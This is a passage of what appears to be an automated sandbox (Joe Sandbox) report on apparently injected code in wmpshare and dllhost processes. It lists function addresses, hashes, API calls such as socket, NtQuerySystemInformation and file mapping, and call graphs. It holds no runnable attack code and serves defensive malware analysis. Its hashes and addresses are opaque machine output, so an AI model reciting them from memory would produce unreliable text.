                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction ID: 4bcac9a457b3ddd6ef28adf5785e1f90a98cab07518de83cd5486520eab688d1
                                                                                                                                        • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction Fuzzy Hash: 27D0A711325D0D0BFA58633D1C9E72511CAE7DC221F50423AB40AC22C2ED54CC664740
                                                                                                                                        Function 0000028186D5A7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                        • Instruction ID: 5426dea77eca7d0feb6cbcbbb5984cc3ef9f9193cf8a24f28fc30d772ddf78bb
                                                                                                                                        • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                        • Instruction Fuzzy Hash: E941A730218D1E8FEB84EF2CD88DA65B7E4FB68311B15476BE409C3655DB30E8928BC1
                                                                                                                                        Function 0000028186D6DBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                        • Instruction ID: c79c3fc9562a14b4a1aad4701930e361bacab8930add19dcf7573d8f0074a8c8
                                                                                                                                        • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                        • Instruction Fuzzy Hash: 8A11C0342099198FFF749F29989D76432E4EB58316F04427AE84ACA1CACF708C56CBD1
                                                                                                                                        Function 0000028186D94C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                        • Instruction ID: 2a24f2530950bc68a08aefc4728cc6475dcbd7098310ee2face7bd31cfe8b25a
                                                                                                                                        • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                        • Instruction Fuzzy Hash: B9F06D60225D0A4FFFD4EB69849DF2533DAEB58350F609254980AC62D7DF32CC92CB40

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00007DF47420199C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434396750.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                        • String ID: ($.$o
                                                                                                                                        • API String ID: 1778838933-116743476
                                                                                                                                        • Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                        • Instruction ID: 785846850c9d611c535aef07b26d959d45aa9da26995dc07dd834deb1327bc3b
                                                                                                                                        • Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                        • Instruction Fuzzy Hash: 4581603090C7D48EE3759B6894153FBBBE1FF55340F141A2ED0DB832A2E62E9645C752

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:2.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:129
                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                        execution_graph 13736 26e58437ef0 13737 26e58437f14 socket 13736->13737 13739 26e58437f2c 13736->13739 13738 26e58437f47 13737->13738 13737->13739 13738->13739 13741 26e58437b00 13738->13741 13742 26e58437b32 13741->13742 13743 26e58437b55 CreateIoCompletionPort 13742->13743 13746 26e58437b3d 13742->13746 13744 26e58437b6d 13743->13744 13745 26e58437ba2 SetFileCompletionNotificationModes 13744->13745 13744->13746 13745->13746 13746->13739 13747 26e58412690 13750 26e584128d4 13747->13750 13751 26e584126a2 13750->13751 13752 26e584128dd 13750->13752 13752->13751 13753 26e58412944 SetErrorMode 13752->13753 13754 26e58412955 13753->13754 13756 26e58413970 13754->13756 13757 26e58413991 13756->13757 13763 26e58413ae9 13757->13763 13764 26e58413544 13757->13764 13760 26e584139c2 13760->13763 13768 26e5841376c 13760->13768 13761 26e58413a5e 13762 26e58413ad3 NtQuerySystemInformation 13761->13762 13761->13763 13762->13763 13763->13751 13765 26e5841356d 13764->13765 13766 26e58413637 GetVolumeInformationW 13765->13766 13767 26e58413672 13765->13767 13766->13767 13767->13760 13769 26e5841379e 13768->13769 13770 26e5841387e CreateFileMappingW 13769->13770 13771 26e584138b8 MapViewOfFile 13770->13771 13772 26e584138db 13770->13772 13771->13772 13772->13761 13854 26e58412ad2 13855 26e58412ae7 13854->13855 13856 26e58412b07 13855->13856 13857 26e584146c4 closesocket 13855->13857 13857->13856 13882 26e58439554 13883 26e5843955e 13882->13883 13884 26e58439578 13882->13884 13883->13884 13886 26e58437fe0 13883->13886 13887 26e58437ef0 3 API calls 13886->13887 13888 26e58438011 13887->13888 13888->13884 13777 26e58412874 13778 26e5841288e 13777->13778 13779 26e58412893 LoadLibraryA 13778->13779 13780 26e58412898 13778->13780 13779->13780 13905 26e58415454 13906 26e584154c9 13905->13906 13907 26e5841546a 13905->13907 13906->13907 13908 26e584153d4 closesocket 13906->13908 13908->13907 13785 26e58436f3c SetErrorMode 13786 26e58436f50 13785->13786 13787 26e5843a516 socket 13786->13787 13788 26e5843a5a3 socket 13787->13788 13789 26e5843a55a getsockopt 13787->13789 13791 26e5843a5c3 13788->13791 13789->13788 13773 26e584128a0 13774 26e584128bc 13773->13774 13775 26e584128c1 GetProcAddressForCaller 13774->13775 13776 26e584128ca 13774->13776 13775->13776 13878 26e58415540 13879 26e5841555e 13878->13879 13880 26e584153d4 closesocket 13879->13880 13881 26e5841558a 13879->13881 13880->13881 13862 26e584395a4 13863 26e584395b3 13862->13863 13865 26e584395d6 13862->13865 13863->13865 13866 26e58438024 13863->13866 13869 26e58437ef0 13866->13869 13868 26e5843806d 13868->13865 13870 26e58437f14 socket 13869->13870 13872 26e58437f2c 13869->13872 13871 26e58437f47 13870->13871 13870->13872 13871->13872 13873 26e58437b00 2 API calls 13871->13873 13872->13868 13873->13872 13781 26e584392ec 13784 26e58439307 13781->13784 13782 26e584393fa closesocket 13783 26e5843940c 13782->13783 13784->13782 13784->13783 13792 26e5841330c 13793 26e58413378 13792->13793 13794 26e5841331e 13792->13794 13794->13793 13796 26e58415774 13794->13796 13797 26e58415779 13796->13797 13799 26e5841579b 13796->13799 13797->13799 13800 26e584155e0 13797->13800 13799->13794 13801 26e5841560c 13800->13801 13805 26e584156b1 13801->13805 13806 26e58414918 13801->13806 13803 26e58415697 13803->13805 13810 26e584153d4 13803->13810 13805->13799 13808 26e5841493e 13806->13808 13807 26e58414946 13807->13803 13808->13807 13816 26e584146c4 13808->13816 13811 26e58415416 13810->13811 13812 26e584153d9 13810->13812 13811->13805 13813 26e58415400 13812->13813 13828 26e58437854 13812->13828 13813->13811 13815 26e584146c4 closesocket 13813->13815 13815->13811 13819 26e584146d6 13816->13819 13818 26e584146ef 13818->13807 13819->13818 13820 26e58414634 13819->13820 13822 26e5841464f 13820->13822 13821 26e584378a2 13821->13818 13822->13821 13824 26e584392ec 13822->13824 13827 26e58439307 13824->13827 13825 26e584393fa closesocket 13826 26e5843940c 13825->13826 13826->13821 13827->13825 13827->13826 13829 26e58437872 13828->13829 13831 26e584378a2 13828->13831 13830 26e584392ec closesocket 13829->13830 13829->13831 13830->13831 13831->13813 13832 26e58412f2c 13835 26e58412f46 13832->13835 13836 26e58413043 13832->13836 13833 26e584146c4 closesocket 13834 26e58413041 13833->13834 13835->13834 13835->13836 13837 26e58412fc9 13835->13837 13836->13833 13837->13834 13839 26e58415ce8 13837->13839 13843 26e58415d04 13839->13843 13846 26e58415d86 13839->13846 13840 26e58415d81 13840->13834 13841 26e58415d79 13842 26e584146c4 closesocket 13841->13842 13842->13840 13843->13841 13844 26e584153d4 closesocket 13843->13844 13844->13843 13846->13840 13847 26e5841587c 13846->13847 13848 26e584158c3 13847->13848 13849 26e5841594e 13847->13849 13850 26e584158cc 13848->13850 13851 26e58415b2c 13848->13851 13849->13846 13850->13849 13853 26e584153d4 closesocket 13850->13853 13851->13849 13852 26e584155e0 closesocket 13851->13852 13852->13849 13853->13849

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0000026E58413970 Relevance: 1.8, APIs: 1, Instructions: 269nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Information$QuerySystemVolume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2187445334-0
                                                                                                                                        • Opcode ID: 366df0145d4e4ef04104a2e7daee7e13a84692bf91d9a00c067b01e3a5db6b46
                                                                                                                                        • Instruction ID: 1630b221af10b6a234dbb1965e1f18c64a3c71163e8497c7ed2f27626266dacd
                                                                                                                                        • Opcode Fuzzy Hash: 366df0145d4e4ef04104a2e7daee7e13a84692bf91d9a00c067b01e3a5db6b46
                                                                                                                                        • Instruction Fuzzy Hash: C591B131608E194FEBA5EB24C8897EB77E5FB64305F500A3AD45BC31A1EF35D5428781
                                                                                                                                        Function 0000026E58436F3C Relevance: 6.1, APIs: 4, Instructions: 131networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket$ErrorModegetsockopt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 552242919-0
                                                                                                                                        • Opcode ID: 4cb0e89814ea22b6c3dbf18eadc53026059435ae45fe96e1c810839a1f862335
                                                                                                                                        • Instruction ID: 12512256f04c6f08ac8b75d334ba649dc3ae870a65b731028b2869980a289185
                                                                                                                                        • Opcode Fuzzy Hash: 4cb0e89814ea22b6c3dbf18eadc53026059435ae45fe96e1c810839a1f862335
                                                                                                                                        • Instruction Fuzzy Hash: A5419434618A488FFB48EF28D89DA9A77E1FB69304F41862DE497C32A1DF398545CB41
                                                                                                                                        Function 0000026E5841376C Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateMappingView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3452162329-0
                                                                                                                                        • Opcode ID: e61e40734ab55d92af803cbbe52a7616d9210cb446f6f89028e4d403fb3bc0b4
                                                                                                                                        • Instruction ID: 4711068d187128453f5feb728787ff0969db022bd9cdc051996c7f357df87ded
                                                                                                                                        • Opcode Fuzzy Hash: e61e40734ab55d92af803cbbe52a7616d9210cb446f6f89028e4d403fb3bc0b4
                                                                                                                                        • Instruction Fuzzy Hash: A651703151CB988BDB29EB24C8867EFB7E4FB94305F40452FE89BC2191DF3495068B92
                                                                                                                                        Function 0000026E58437B00 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3755109111-0
                                                                                                                                        • Opcode ID: 4b62c4e74f91e1928d8e60aa4cfa3c543324e203f54ad6efd488aa14119b5bfa
                                                                                                                                        • Instruction ID: 72bff0b091ea6e6316ffaa0dbf12ca85af685a45f53d9a04867f685eaa73ce74
                                                                                                                                        • Opcode Fuzzy Hash: 4b62c4e74f91e1928d8e60aa4cfa3c543324e203f54ad6efd488aa14119b5bfa
                                                                                                                                        • Instruction Fuzzy Hash: 4D31A4343045294BFF549B28989877B32E9E77431DF921179EDA7C2182DF26CC829691
                                                                                                                                        Function 0000026E58413544 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationVolume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2039140958-0
                                                                                                                                        • Opcode ID: fb462ad52302083c820534d5c6544ef6097ed86bfcc459703069b83cac3bda6c
                                                                                                                                        • Instruction ID: a035436b386f4701597b816baa83647c371df007582a5d15f5deff9752fdf6d3
                                                                                                                                        • Opcode Fuzzy Hash: fb462ad52302083c820534d5c6544ef6097ed86bfcc459703069b83cac3bda6c
                                                                                                                                        • Instruction Fuzzy Hash: 6851903111C7988BD76AEF24C8956EBB7E1FB98305F410A2EE4DBC22A1DF749105CB42
                                                                                                                                        Function 0000026E584392EC Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 173 26e584392ec-26e58439305 174 26e58439331-26e58439336 173->174 175 26e58439307-26e5843930c 173->175 176 26e58439338-26e58439340 174->176 177 26e5843938a-26e5843939e 174->177 178 26e58439320-26e5843932a call 26e58439260 175->178 179 26e5843930e-26e5843931e 175->179 176->177 180 26e58439342-26e5843934c call 26e58439260 176->180 181 26e584393a0-26e584393ab 177->181 182 26e584393c6-26e584393cd 177->182 178->177 195 26e5843932c-26e5843932f 178->195 179->177 180->177 196 26e5843934e-26e58439350 180->196 181->182 188 26e584393ad-26e584393af 181->188 185 26e584393cf-26e584393da 182->185 186 26e584393f5-26e584393f8 182->186 185->186 191 26e584393dc-26e584393de 185->191 192 26e5843940c-26e58439417 186->192 193 26e584393fa-26e58439407 closesocket 186->193 188->182 194 26e584393b1-26e584393b4 188->194 191->186 197 26e584393e0-26e584393e3 191->197 198 26e5843941f-26e58439423 192->198 199 26e58439419-26e5843941d 192->199 193->192 194->182 200 26e584393b6-26e584393bd 194->200 195->177 202 26e58439353-26e58439363 196->202 197->186 203 26e584393e5-26e584393ec 197->203 204 26e58439427-26e58439436 198->204 199->198 199->204 200->182 201 26e584393bf-26e584393c3 200->201 201->182 205 26e5843937e-26e58439388 202->205 206 26e58439365-26e5843936d 202->206 203->186 207 26e584393ee-26e584393f2 203->207 208 26e58439452-26e5843945c 204->208 209 26e58439438-26e5843943e 204->209 205->177 205->202 206->205 210 26e5843936f-26e58439376 206->210 207->186 209->208 211 26e58439440-26e5843944f 209->211 210->205 211->208
                                                                                                                                        APIs
                                                                                                                                        • closesocket.WS2_32(?,?,?,?,00000001,?,?,0000026E5843790E), ref: 0000026E58439401
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                        • Opcode ID: 5543650828b91c9091ba2f5705f08a79c55bf69c5ca34b8a0067fb2e05718b7e
                                                                                                                                        • Instruction ID: 823c7cd375ee7acc65cacc9cfcc8c3d916ed6c0562a572dae2099c709cb3ecc6
                                                                                                                                        • Opcode Fuzzy Hash: 5543650828b91c9091ba2f5705f08a79c55bf69c5ca34b8a0067fb2e05718b7e
                                                                                                                                        • Instruction Fuzzy Hash: BB5173B45146558FEF94DF28C4C83693B98FB66368F911295DC37CA1C6DB35C8D2CA80
                                                                                                                                        Function 0000026E58437EF0 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: socket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                        • Opcode ID: 889c076db4e13e0dce3636affe34b04e8375d4463a9dd642bcf181619ff16f9a
                                                                                                                                        • Instruction ID: ca895b092d038e5b087d2250899e48a6da895649ee863e5e0c419e6e0dc06ce8
                                                                                                                                        • Opcode Fuzzy Hash: 889c076db4e13e0dce3636affe34b04e8375d4463a9dd642bcf181619ff16f9a
                                                                                                                                        • Instruction Fuzzy Hash: 5A21D3343145184FEF48AB38988D76B33D5FB64329F514679EC7BC62D1DF258C828691
                                                                                                                                        Function 0000026E584128D4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 17021827bcf03d9d61a7ff2e5705af7498b5480386205b6e714f2b9535ad61ed
                                                                                                                                        • Instruction ID: 84038bed8bee96ab8c3f74ab7e0bbaff1b0e796549197c3a65f761e54ae7186e
                                                                                                                                        • Opcode Fuzzy Hash: 17021827bcf03d9d61a7ff2e5705af7498b5480386205b6e714f2b9535ad61ed
                                                                                                                                        • Instruction Fuzzy Hash: 9D016138324A390BEE59F378485937F62DFEB94218F860129EC2BD21D2DF1ACA064641
                                                                                                                                        Function 0000026E584128A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCallerProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2663294120-0
                                                                                                                                        • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                        • Instruction ID: e1201f75a9665cf696bdb8ce6c1eb3c0eb5884e8113b306dc33e685124cfefa2
                                                                                                                                        • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                        • Instruction Fuzzy Hash: E9E02B21704C1D0BAFA872BE248C77751CAC7DC276744027BF82EC3295ED11CC560390
                                                                                                                                        Function 0000026E58412874 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 265 26e58412874-26e58412891 call 26e58411994 268 26e58412893-26e58412896 LoadLibraryA 265->268 269 26e58412898-26e5841289e 265->269 268->269
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.3432099675.0000026E58410000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026E58410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_35_2_26e58410000_dllhost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction ID: 24e354fec36cf7eb4ee47cea595fb7a26ffb6b9ba3f281c09ecbacdfe193c3da
                                                                                                                                        • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction Fuzzy Hash: 64D0A720330D1E1BEE48633D1C9837611C9E7DC229F91113AF81AC2281DA59CC564300